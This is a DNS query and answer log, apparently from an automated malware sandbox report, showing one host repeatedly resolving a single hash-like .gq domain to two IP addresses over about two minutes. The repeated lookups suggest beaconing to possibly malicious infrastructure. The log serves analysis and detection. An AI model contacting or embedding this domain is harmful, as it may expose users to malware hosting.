                      Oct 14, 2021 08:30:11.092576981 CEST192.168.2.68.8.8.80xdd1Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:12.873286009 CEST192.168.2.68.8.8.80x11e2Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:15.296228886 CEST192.168.2.68.8.8.80x9ccStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:16.637487888 CEST192.168.2.68.8.8.80x2770Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:18.273524046 CEST192.168.2.68.8.8.80x6e34Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Oct 14, 2021 08:28:19.010951996 CEST8.8.8.8192.168.2.60x9641No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:19.010951996 CEST8.8.8.8192.168.2.60x9641No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:20.325933933 CEST8.8.8.8192.168.2.60xcfd3No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:20.325933933 CEST8.8.8.8192.168.2.60xcfd3No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:21.317846060 CEST8.8.8.8192.168.2.60x66b6No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:21.317846060 CEST8.8.8.8192.168.2.60x66b6No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:22.570988894 CEST8.8.8.8192.168.2.60x7b38No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:22.570988894 CEST8.8.8.8192.168.2.60x7b38No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:23.760160923 CEST8.8.8.8192.168.2.60x65d8No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:23.760160923 CEST8.8.8.8192.168.2.60x65d8No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:24.865097046 CEST8.8.8.8192.168.2.60xc6baNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:24.865097046 CEST8.8.8.8192.168.2.60xc6baNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:26.003031015 CEST8.8.8.8192.168.2.60xa520No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:26.003031015 CEST8.8.8.8192.168.2.60xa520No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:27.316716909 CEST8.8.8.8192.168.2.60x111eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:27.316716909 CEST8.8.8.8192.168.2.60x111eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:30.266340971 CEST8.8.8.8192.168.2.60x868No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:30.266340971 CEST8.8.8.8192.168.2.60x868No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:31.363276005 CEST8.8.8.8192.168.2.60xe6eeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:31.363276005 CEST8.8.8.8192.168.2.60xe6eeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:32.486987114 CEST8.8.8.8192.168.2.60x3d76No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:32.486987114 CEST8.8.8.8192.168.2.60x3d76No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:33.648431063 CEST8.8.8.8192.168.2.60x69a5No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:33.648431063 CEST8.8.8.8192.168.2.60x69a5No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:34.869492054 CEST8.8.8.8192.168.2.60x38bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:34.869492054 CEST8.8.8.8192.168.2.60x38bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:35.970498085 CEST8.8.8.8192.168.2.60xc4aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:35.970498085 CEST8.8.8.8192.168.2.60xc4aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:37.092448950 CEST8.8.8.8192.168.2.60x7d39No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:37.092448950 CEST8.8.8.8192.168.2.60x7d39No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:38.365737915 CEST8.8.8.8192.168.2.60xe711No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:38.365737915 CEST8.8.8.8192.168.2.60xe711No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:39.491631031 CEST8.8.8.8192.168.2.60x25efNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:39.491631031 CEST8.8.8.8192.168.2.60x25efNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:41.065442085 CEST8.8.8.8192.168.2.60x4f40No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:41.065442085 CEST8.8.8.8192.168.2.60x4f40No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:42.252979994 CEST8.8.8.8192.168.2.60x6b50No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:42.252979994 CEST8.8.8.8192.168.2.60x6b50No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:43.845922947 CEST8.8.8.8192.168.2.60xcc8cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:43.845922947 CEST8.8.8.8192.168.2.60xcc8cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:45.178029060 CEST8.8.8.8192.168.2.60xae8bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:45.178029060 CEST8.8.8.8192.168.2.60xae8bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:48.019318104 CEST8.8.8.8192.168.2.60xd0feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:48.019318104 CEST8.8.8.8192.168.2.60xd0feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:49.638375998 CEST8.8.8.8192.168.2.60x1cfeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:49.638375998 CEST8.8.8.8192.168.2.60x1cfeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:50.949512959 CEST8.8.8.8192.168.2.60x2f14No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:50.949512959 CEST8.8.8.8192.168.2.60x2f14No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:52.300395012 CEST8.8.8.8192.168.2.60x9b51No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:52.300395012 CEST8.8.8.8192.168.2.60x9b51No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:53.543016911 CEST8.8.8.8192.168.2.60x9b5cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:53.543016911 CEST8.8.8.8192.168.2.60x9b5cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:54.625006914 CEST8.8.8.8192.168.2.60xfafNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:54.625006914 CEST8.8.8.8192.168.2.60xfafNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:56.054569006 CEST8.8.8.8192.168.2.60xc5d7No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:56.054569006 CEST8.8.8.8192.168.2.60xc5d7No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:57.496562958 CEST8.8.8.8192.168.2.60x7539No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:57.496562958 CEST8.8.8.8192.168.2.60x7539No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:58.857067108 CEST8.8.8.8192.168.2.60xcc85No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:58.857067108 CEST8.8.8.8192.168.2.60xcc85No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:00.278069973 CEST8.8.8.8192.168.2.60xca48No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:00.278069973 CEST8.8.8.8192.168.2.60xca48No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:01.640744925 CEST8.8.8.8192.168.2.60x41feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:01.640744925 CEST8.8.8.8192.168.2.60x41feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:03.056396961 CEST8.8.8.8192.168.2.60x76cbNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:03.056396961 CEST8.8.8.8192.168.2.60x76cbNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:06.133622885 CEST8.8.8.8192.168.2.60xe495No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:06.133622885 CEST8.8.8.8192.168.2.60xe495No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:07.510478020 CEST8.8.8.8192.168.2.60xc716No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:07.510478020 CEST8.8.8.8192.168.2.60xc716No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:08.701395035 CEST8.8.8.8192.168.2.60x56caNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:08.701395035 CEST8.8.8.8192.168.2.60x56caNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:09.889010906 CEST8.8.8.8192.168.2.60xad00No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:09.889010906 CEST8.8.8.8192.168.2.60xad00No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:11.098392010 CEST8.8.8.8192.168.2.60xfca0No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:11.098392010 CEST8.8.8.8192.168.2.60xfca0No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:12.326812029 CEST8.8.8.8192.168.2.60xce7cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:12.326812029 CEST8.8.8.8192.168.2.60xce7cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:13.634321928 CEST8.8.8.8192.168.2.60xb217No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:13.634321928 CEST8.8.8.8192.168.2.60xb217No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:15.112957954 CEST8.8.8.8192.168.2.60x1e24No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:15.112957954 CEST8.8.8.8192.168.2.60x1e24No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:16.638273001 CEST8.8.8.8192.168.2.60xce2aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:16.638273001 CEST8.8.8.8192.168.2.60xce2aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:17.987740993 CEST8.8.8.8192.168.2.60xf846No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:17.987740993 CEST8.8.8.8192.168.2.60xf846No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:20.374650002 CEST8.8.8.8192.168.2.60xfa06No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:20.374650002 CEST8.8.8.8192.168.2.60xfa06No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:21.795156002 CEST8.8.8.8192.168.2.60xc8c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:21.795156002 CEST8.8.8.8192.168.2.60xc8c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:23.396900892 CEST8.8.8.8192.168.2.60x4036No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:23.396900892 CEST8.8.8.8192.168.2.60x4036No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:27.445975065 CEST8.8.8.8192.168.2.60x9f87No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:27.445975065 CEST8.8.8.8192.168.2.60x9f87No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:29.624861002 CEST8.8.8.8192.168.2.60xf256No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:29.624861002 CEST8.8.8.8192.168.2.60xf256No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:31.713087082 CEST8.8.8.8192.168.2.60xb97aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:31.713087082 CEST8.8.8.8192.168.2.60xb97aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:32.984905005 CEST8.8.8.8192.168.2.60xe4c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:32.984905005 CEST8.8.8.8192.168.2.60xe4c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:35.243751049 CEST8.8.8.8192.168.2.60x3787No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:35.243751049 CEST8.8.8.8192.168.2.60x3787No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:36.947783947 CEST8.8.8.8192.168.2.60x493No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:36.947783947 CEST8.8.8.8192.168.2.60x493No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:38.117574930 CEST8.8.8.8192.168.2.60x3e93No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:38.117574930 CEST8.8.8.8192.168.2.60x3e93No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:39.349596024 CEST8.8.8.8192.168.2.60x6c70No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:39.349596024 CEST8.8.8.8192.168.2.60x6c70No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:40.681256056 CEST8.8.8.8192.168.2.60x37c8No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:40.681256056 CEST8.8.8.8192.168.2.60x37c8No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:41.851002932 CEST8.8.8.8192.168.2.60x82b7No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:41.851002932 CEST8.8.8.8192.168.2.60x82b7No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:43.256962061 CEST8.8.8.8192.168.2.60xed11No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:43.256962061 CEST8.8.8.8192.168.2.60xed11No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:44.406697989 CEST8.8.8.8192.168.2.60xcc0dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:44.406697989 CEST8.8.8.8192.168.2.60xcc0dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:45.741152048 CEST8.8.8.8192.168.2.60x5ccfNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:45.741152048 CEST8.8.8.8192.168.2.60x5ccfNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:46.900079012 CEST8.8.8.8192.168.2.60x83fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:46.900079012 CEST8.8.8.8192.168.2.60x83fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:48.029814005 CEST8.8.8.8192.168.2.60x69c5No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:48.029814005 CEST8.8.8.8192.168.2.60x69c5No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:49.299062967 CEST8.8.8.8192.168.2.60x6449No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:49.299062967 CEST8.8.8.8192.168.2.60x6449No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:51.858999968 CEST8.8.8.8192.168.2.60x6899No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:51.858999968 CEST8.8.8.8192.168.2.60x6899No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:55.815201998 CEST8.8.8.8192.168.2.60xdfe6No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:55.815201998 CEST8.8.8.8192.168.2.60xdfe6No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:56.942806959 CEST8.8.8.8192.168.2.60xdd17No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:56.942806959 CEST8.8.8.8192.168.2.60xdd17No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:58.047533989 CEST8.8.8.8192.168.2.60xb23No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:58.047533989 CEST8.8.8.8192.168.2.60xb23No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:59.205523968 CEST8.8.8.8192.168.2.60x4332No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:59.205523968 CEST8.8.8.8192.168.2.60x4332No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:00.285648108 CEST8.8.8.8192.168.2.60x4eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:00.285648108 CEST8.8.8.8192.168.2.60x4eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:01.393187046 CEST8.8.8.8192.168.2.60xbb96No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:01.393187046 CEST8.8.8.8192.168.2.60xbb96No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:02.525789976 CEST8.8.8.8192.168.2.60x9297No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:02.525789976 CEST8.8.8.8192.168.2.60x9297No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:03.674351931 CEST8.8.8.8192.168.2.60x202fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:03.674351931 CEST8.8.8.8192.168.2.60x202fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:04.856111050 CEST8.8.8.8192.168.2.60x89b0No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:04.856111050 CEST8.8.8.8192.168.2.60x89b0No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:05.935167074 CEST8.8.8.8192.168.2.60xe22dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:05.935167074 CEST8.8.8.8192.168.2.60xe22dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:07.119254112 CEST8.8.8.8192.168.2.60x1524No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:07.119254112 CEST8.8.8.8192.168.2.60x1524No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:08.415246964 CEST8.8.8.8192.168.2.60x1ae7No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:08.415246964 CEST8.8.8.8192.168.2.60x1ae7No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:09.670599937 CEST8.8.8.8192.168.2.60xbc15No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:09.670599937 CEST8.8.8.8192.168.2.60xbc15No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:11.109034061 CEST8.8.8.8192.168.2.60xdd1No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:11.109034061 CEST8.8.8.8192.168.2.60xdd1No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:12.891690969 CEST8.8.8.8192.168.2.60x11e2No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:12.891690969 CEST8.8.8.8192.168.2.60x11e2No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
